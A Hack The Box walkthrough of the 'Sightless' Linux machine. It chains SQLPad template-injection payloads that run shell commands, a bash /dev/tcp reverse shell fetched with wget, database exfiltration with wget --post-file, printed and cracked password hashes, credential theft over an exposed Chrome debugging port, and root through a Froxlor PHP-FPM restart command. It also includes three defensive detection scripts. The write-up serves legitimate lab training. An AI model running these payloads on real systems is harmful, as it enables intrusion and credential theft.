Hack The Box / LINUX / 2026-03-27
Hack The Box - Sightless (Linux)
SQLPad SSTI leads to container root shell, credential cracking yields michael access, browser automation credential theft for Froxlor admin, and command execution via PHP-FPM restart command to root.
Target
- IP: 10.129.225.142
Recon
sudo nmap -sC -sV 10.129.225.142 -p- -T5 -v
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.225.142]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add sightless.htb to /etc/hosts.
Go to http://sightless.htb.
There is a button to sqlpad.sightless.htb, add it to /etc/hosts.
Go to http://sqlpad.sightless.htb and check About.
Version is 6.10.0.
There is a vulnerability: CVE-2022-0944. Useful references:
- https://vuldb.com/?id.194925
- https://github.com/advisories/GHSA-xrh7-6fvm-56v5
Initial Access (SQLPad SSTI)
Create a new connection. Choose MySQL. Put this in host field:
{{this}}
Click Test. We get:
getaddrinfo ENOTFOUND [object global]
This confirms SSTI: the host value is evaluated as a template expression, and the rendered global object ends up in the DNS lookup error. SQLPad is Node.js based.
Use this template:
{{global.process.mainModule.require('child_process').spawnSync('id').stdout}}
We get:
uid=0(root) gid=0(root) groups=0(root)
We are likely inside a Docker container.
{{global.process.mainModule.require('child_process').spawnSync('ls').stdout}}
getaddrinfo ENOTFOUND cache sessions sqlpad.sqlite
{{global.process.mainModule.require('child_process').spawnSync('pwd').stdout}}
/var/lib/sqlpad
{{global.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}}
Alternative:
{{global.process.mainModule.require('fs').readFileSync('/etc/passwd')}}
We notice user michael.
{{global.process.mainModule.require('child_process').spawnSync('which', ['wget']).stdout}}
getaddrinfo ENOTFOUND /usr/bin/wget
wget exists, curl does not.
Create file rev with content:
bash -i >& /dev/tcp/10.10.16.14/4444 0>&1
Start listeners:
python3 -m http.server 80
nc -vlnp 4444
Execute:
{{global.process.mainModule.require('child_process').spawnSync('wget', ['http://10.10.16.14/rev', '-O', '/dev/shm/rev']).stdout}}
{{global.process.mainModule.require('child_process').spawnSync('bash', ['/dev/shm/rev']).stdout}}
We get a reverse shell as root inside the Docker container.
There is no python3 in the container, so upgrade the shell to an interactive terminal with script instead:
script -qc /bin/bash /dev/null
# CTRL+Z
stty raw -echo
fg
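The SSTI above works because a connection field is rendered as a template before it is used. As an added example (not from this writeup or from SQLPad), here is a small defender-side check that classifies submitted connection host values as benign, a template probe like {{this}}, or a template expression reaching into Node.js internals; the event dicts and the hostname db.internal.example are constructed.

```python
import re

# Handlebars/Mustache style expression, the syntax abused in the SQLPad connection test
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}", re.DOTALL)

# Tokens that indicate an attempt to reach Node.js process/module internals
# from inside a template rather than a harmless placeholder.
RCE_TOKENS = (
    "process", "require", "child_process", "spawnSync", "execSync",
    "readFileSync", "mainModule", "constructor",
)

def find_template_expressions(value: str) -> list:
    """Return the bodies of every {{ ... }} expression found in a submitted field."""
    return [m.strip() for m in TEMPLATE_RE.findall(value)]

def classify_field(value: str) -> str:
    """Classify a field as benign, a template probe, or a template RCE attempt."""
    exprs = find_template_expressions(value)
    if not exprs:
        return "benign"
    if any(tok in expr for expr in exprs for tok in RCE_TOKENS):
        return "template-rce"
    return "template-probe"

def review_connection_tests(events: list) -> list:
    """Review connection-test events and return the suspicious ones with a verdict."""
    findings = []
    for ev in events:
        verdict = classify_field(ev.get("host", ""))
        if verdict != "benign":
            findings.append({**ev, "verdict": verdict})
    return findings

# Constructed sample events; the template payloads mirror the ones used above.
SAMPLE_EVENTS = [
    {"user": "admin@sightless.htb", "host": "db.internal.example", "driver": "mysql"},
    {"user": "admin@sightless.htb", "host": "{{this}}", "driver": "mysql"},
    {"user": "admin@sightless.htb", "driver": "mysql",
     "host": "{{global.process.mainModule.require('child_process').spawnSync('id').stdout}}"},
]

if __name__ == "__main__":
    for f in review_connection_tests(SAMPLE_EVENTS):
        print(f["verdict"], f["host"])
```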
Credential Recovery
Download sqlpad.sqlite:
nc -vlnp 8000 > sqlpad.sqlite
wget --post-file=sqlpad.sqlite http://10.10.16.14:8000/
vim sqlpad.sqlite
Remove the HTTP request headers that wget prepends to the upload; the file must start with the SQLite header.
sqlite3 sqlpad.sqlite
.tables
We notice a users table.
PRAGMA table_info(users);
0|id|VARCHAR(255)|0||1
1|email|VARCHAR(255)|0||0
2|role|VARCHAR(255)|1||0
3|name|VARCHAR(255)|0||0
4|passhash|VARCHAR(255)|0||0
5|password_reset_id|UUID|0||0
6|data|JSON|0||0
7|signup_at|DATETIME|0||0
8|created_at|DATETIME|1||0
9|updated_at|DATETIME|1||0
10|disabled|TINYINT(1)|0||0
11|sync_auth_role|TINYINT(1)|0||0
12|ldap_id|VARCHAR(255)|0||0
select * from users;
da9a25f7-588c-40f5-89db-58fbebab591f|admin@sightless.htb|admin||$2a$10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC||||2024-05-15 04:48:09.377 +00:00|2024-05-15 18:16:54.652 +00:00|0||
26113beb-60eb-4a58-81eb-2318e27eb3bf|john@sightless.htb|editor|||2d3499e3-16ba-4b4b-a49e-c7c5dca89f2d|||2024-05-15 12:29:23.725 +00:00|2024-05-15 12:29:27.257 +00:00||0|
Put the admin hash into a file named hash and crack it:
hashcat -a 0 -m 3200 ./hash ./rockyou.txt
$2a$10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC:admin
The password admin is not useful anywhere else.
cat /etc/shadow
We notice:
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
Put the hash in a file and crack it:
hashcat -a 0 ./hash ./rockyou.txt
$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse
ssh michael@sightless.htb
Use recovered password. Login is successful.
Local Service Abuse to Root
cat /etc/passwd
We notice user john.
cat /etc/apache2/sites-available/000-default.conf
We notice domain admin.sightless.htb on 127.0.0.1:8080.
Add this to /etc/hosts:
127.0.0.1 admin.sightless.htb
ssh michael@sightless.htb -NL 8080:localhost:8080
Go to http://admin.sightless.htb:8080.
It is Froxlor with login form.
Known credentials do not work.
Download pspy64 and upload to victim:
- https://github.com/DominicBreuker/pspy
./pspy64
We notice:
2024/09/09 14:16:28 CMD: UID=1001 PID=1700 | /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1649 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1725848905032127 --launc
2024/09/09 14:16:28 CMD: UID=1001 PID=1672 | /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1649 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,1253023565470462605,4926552177838223311,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1670 | /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1649 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
2024/09/09 14:16:28 CMD: UID=1001 PID=1654 | /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1649 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1653 | /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1649 --enable-crash-reporter
2024/09/09 14:16:28 CMD: UID=1001 PID=1649 | /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
2024/09/09 14:16:28 CMD: UID=1001 PID=1647 | /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.nAxEN1 data:,
2024/09/09 14:16:28 CMD: UID=1001 PID=1641 |
2024/09/09 14:16:28 CMD: UID=1001 PID=1636 | /home/john/automation/chromedriver --port=39217
2024/09/09 14:16:28 CMD: UID=1001 PID=1635 | /usr/bin/python3 /home/john/automation/administration.py
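The pspy output shows a headless Chrome session started by chromedriver with --remote-debugging-port and --no-sandbox, which is what makes the credential theft below possible. As an added example (not from this writeup or from pspy), here is a parser for pspy's line format that flags such browser-automation indicators; the sample capture is constructed and shortened from the lines above.

```python
import re
from typing import Optional

# pspy prints one process per line: "<date> <time> CMD: UID=<uid> PID=<pid> | <command line>"
PSPY_LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\d+) +PID=(?P<pid>\d+) +\| ?(?P<cmd>.*)$"
)

def parse_pspy_line(line: str) -> Optional[dict]:
    """Parse one pspy line; return None for lines that do not match the format."""
    m = PSPY_LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": m["ts"], "uid": int(m["uid"]), "pid": int(m["pid"]), "cmd": m["cmd"].strip()}

def flag_browser_automation(proc: dict) -> list:
    """Return the risk indicators found in one process command line."""
    cmd = proc["cmd"]
    flags = []
    # Any value opens a DevTools endpoint; port 0 means an ephemeral port chosen at
    # launch, so only a socket listing (ss -ltpn) reveals where it is reachable.
    if re.search(r"--remote-debugging-port=\d+", cmd):
        flags.append("devtools-exposed")
    if "--no-sandbox" in cmd:
        flags.append("sandbox-disabled")
    if "--enable-automation" in cmd or "--test-type=webdriver" in cmd:
        flags.append("automation-session")
    if "chromedriver" in cmd and "--port=" in cmd:
        flags.append("webdriver-listener")
    return flags

def review_pspy_log(lines: list) -> list:
    """Parse a pspy capture and return each process that carries at least one indicator."""
    findings = []
    for line in lines:
        proc = parse_pspy_line(line)
        if proc and (flags := flag_browser_automation(proc)):
            findings.append({**proc, "flags": flags})
    return findings

# Constructed sample capture, shortened from the pspy output above.
SAMPLE_PSPY = [
    "2024/09/09 14:16:28 CMD: UID=1001 PID=1647 | /opt/google/chrome/chrome --enable-automation --headless --no-sandbox --remote-debugging-port=0 --test-type=webdriver data:,",
    "2024/09/09 14:16:28 CMD: UID=1001 PID=1641 | ",
    "2024/09/09 14:16:28 CMD: UID=1001 PID=1636 | /home/john/automation/chromedriver --port=39217",
    "2024/09/09 14:16:28 CMD: UID=1001 PID=1635 | /usr/bin/python3 /home/john/automation/administration.py",
]
```

Run review_pspy_log over a saved pspy capture to list the processes worth a closer look, with their UID and PID.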
ss -ltpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 10 127.0.0.1:33921 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:44853 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 5 127.0.0.1:39217 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*
Port 33921 is the remote debugging port of the headless Chrome session. Forward it:
ssh michael@sightless.htb -NL 33921:localhost:33921
Open Chrome and go to:
chrome://inspect/#devices
Add target localhost:33921.
A device appears.
Click Inspect.
We can see the credentials being filled in and a successful login. Go to the Network tab and click index.php. In the payload we see the credentials:
loginname: admin
password: ForlorfroxAdmin
Go to http://admin.sightless.htb:8080/ and login with recovered credentials.
Go to PHP -> PHP-FPM versions.
Set the PHP-FPM restart command to:
bash /dev/shm/rev
Create /dev/shm/rev with:
bash -i >& /dev/tcp/10.10.16.14/4444 0>&1
chmod 777 rev
Start listener:
nc -vlnp 4444
We get reverse shell as root.
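The last step works because Froxlor lets an admin store an arbitrary restart command that is later run as root. As an added example (not from this writeup or from Froxlor), here is a policy check that only accepts a systemctl or service invocation of a phpX.Y-fpm unit and rejects anything else, such as the script path used above; the settings dict and its names are constructed.

```python
import re
import shlex

# Only a service manager may be the program, and it may only restart/reload a PHP-FPM unit.
ALLOWED_PROGRAMS = [
    re.compile(r"^(/usr/bin/|/bin/)?systemctl$"),
    re.compile(r"^(/usr/sbin/|/sbin/)?service$"),
]
SERVICE_RE = re.compile(r"^php\d+(\.\d+)?-fpm(\.service)?$")
ACTIONS = ("restart", "reload")

def audit_restart_command(command: str) -> tuple:
    """Return (ok, reason) for a configured PHP-FPM restart command."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, f"unparseable command: {exc}"
    if not argv:
        return False, "empty command"
    prog = argv[0]
    if not any(p.match(prog) for p in ALLOWED_PROGRAMS):
        return False, f"unexpected program: {prog}"
    if len(argv) != 3:
        return False, "restart command must have exactly one action and one unit"
    if prog.endswith("systemctl"):
        action, unit = argv[1], argv[2]
    else:
        unit, action = argv[1], argv[2]
    if action not in ACTIONS:
        return False, f"unexpected action: {action}"
    if not SERVICE_RE.match(unit):
        return False, f"unexpected unit: {unit}"
    return True, "ok"

def audit_settings(settings: dict) -> list:
    """Return the names of settings whose restart command fails the policy."""
    return [name for name, cmd in settings.items() if not audit_restart_command(cmd)[0]]

# Constructed settings: two expected shapes and the value set in the abuse above.
SAMPLE_SETTINGS = {
    "php-8.1 restart": "/usr/bin/systemctl restart php8.1-fpm",
    "php-7.4 restart": "service php7.4-fpm restart",
    "tampered": "bash /dev/shm/rev",
}
```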